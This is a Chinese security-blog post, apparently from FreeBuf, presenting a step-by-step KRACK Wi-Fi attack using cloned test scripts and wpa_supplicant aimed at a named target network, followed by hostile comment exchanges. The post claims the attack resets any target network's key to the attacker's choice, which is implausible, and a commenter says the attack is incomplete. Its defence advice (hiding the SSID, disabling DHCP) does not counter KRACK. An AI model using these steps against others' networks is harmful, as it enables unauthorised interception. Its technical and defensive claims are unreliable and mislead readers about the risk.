国内研究人员首次Wifi重大漏洞利用实现 | Krack攻击测试套件打包

2017-11-13 +10 315041人围观 ,发现 88 个不明物体 无线安全

弹出连接提示弹窗后,输入任意密码位数均可,尝试连接,目标wifi会被攻击,创造握手,目标wifi密钥会被重置成你设定的密钥,在iphone上可以看到有人不断连接和断开,这时候就是连接成功,可以开始监听,利用中间人技术,这里以iphone手机做测试。Krack曝出来很久了,所以在11.3号写下这篇文章,思来想去就发表在freebuf这吧。

从事件开始到现在也一直没有攻击的套件和利用文章,按步骤操作,过程很简单,研究人员都可以看懂,不提倡恶意攻击者使用,所以就不写傻瓜tou式教程lan,在绝大用户都没更新的时候,还是希望这篇文章只是作为研究使用(漏洞没有那么大的伤害性)

打开终端:

apt-get update
apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome

1 (2).PNG

下载文件:

git clone https://github.com/NoahhhRyan/krackattacks-test

cd krackattacks-test-research  cd krackattacks

chmod 777 krack-ft-test.py

chmod 777 disable-hwcrypto.sh

./disable-hwcrypto.sh

python krack-ft-test.py

1 (3).PNG

设置network.conf文件,在目录里需要将里面的”testnet”改成你要攻击的wifi名,密码随意,保存在套件目录下:

1 (4).PNG

1 (5).PNG

最后执行如下命令,并尝试连接目标开始攻击,等待结果。

sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf

1 (1).png


84C5897CD029760535314FA062CE9685.png

然后也可以对任意wifi进行攻击,在wifi列表点击连接即可,在苹果手机上的热点栏能看到攻击者不断连接和断开,这里我们再测试了一个wifi,效果同样可以。

IMG_2797.JPG

防御方法

总结一下,提供一个暂时的解决办法,更改路由器默认用户名,密码和SSID,打开防火墙,关闭SSID广播,为自己的用户设置单独的SSID,完全关闭DHCP。

危害性

其实不用那么担心,咱们大天朝wifi万能钥匙都存在多少年了,比它牛逼多了,也没见你们害怕啊。。

Thanks for all.
Weibo@NoahhhRyan.

*本文作者:NoahhhRyan,转载请注明来自FreeBuf.COM

这些评论亮了

  • 楼主蹭热度无疑,攻击步骤都未完成,只完成了攻击步骤的第3步,总共有7步。
    我就问你攻击完了没?数据抓到了没?
    我强烈怀疑你对密钥重装攻击的原理懂不懂?密钥重装攻击是中间人攻击,是在用户和AP正常通信时,发大量垃圾包,使得第三次握手的包无法被用户收到。
    发包的操作在第5步,你的文章只字不提。
    根本就没有做到这一步。
    你还说是和漏洞发现者合作的公司里唯一的华人工程师。
    这我就呵呵了,这篇论文发表在CSS 2017上,论文作者是比利时鲁汶大学的学者,两位学者根本没有成立任何公司,我师兄就在比利时鲁汶大学做密码学的访问学者,我问他,他都不知道还有什么公司唯一华人工程师一说。
    强烈建议Freebuf编辑严格审稿,撤下该篇文章!
    )18( 亮了
  • NoahhhRyan (2级) Hackers drink to life and soci... 回复

    傻叉生活的不如意我理解,再见了您内。
    )16( 亮了
  • NoahhhRyan (2级) Hackers drink to life and soci... 回复

    我不想笑你啊,现在人都什么心态,微博教了你一小时自己把wifi掐灭了我懒得理你还不行?稿费?你脑子塞屎了?哪有一毛稿费?有鸡毛热度?用得着趁吗?你师兄你师兄,怎么不说你爸爸?你知道研发这套重置一共多少人?你那师兄爸爸叫啥?最后问你连上wifi没?
    )14( 亮了
  • NoahhhRyan (2级) Hackers drink to life and soci... 回复
    第三阶段效果,下一步我会更新。
    )12( 亮了
  • NoahhhRyan (2级) Hackers drink to life and soci... 回复
    很菜的菜鸟牛您这是想啥,那就是我们公司官网啊。
    )9( 亮了
发表评论

已有 88 条评论

取消
Loading...
css.php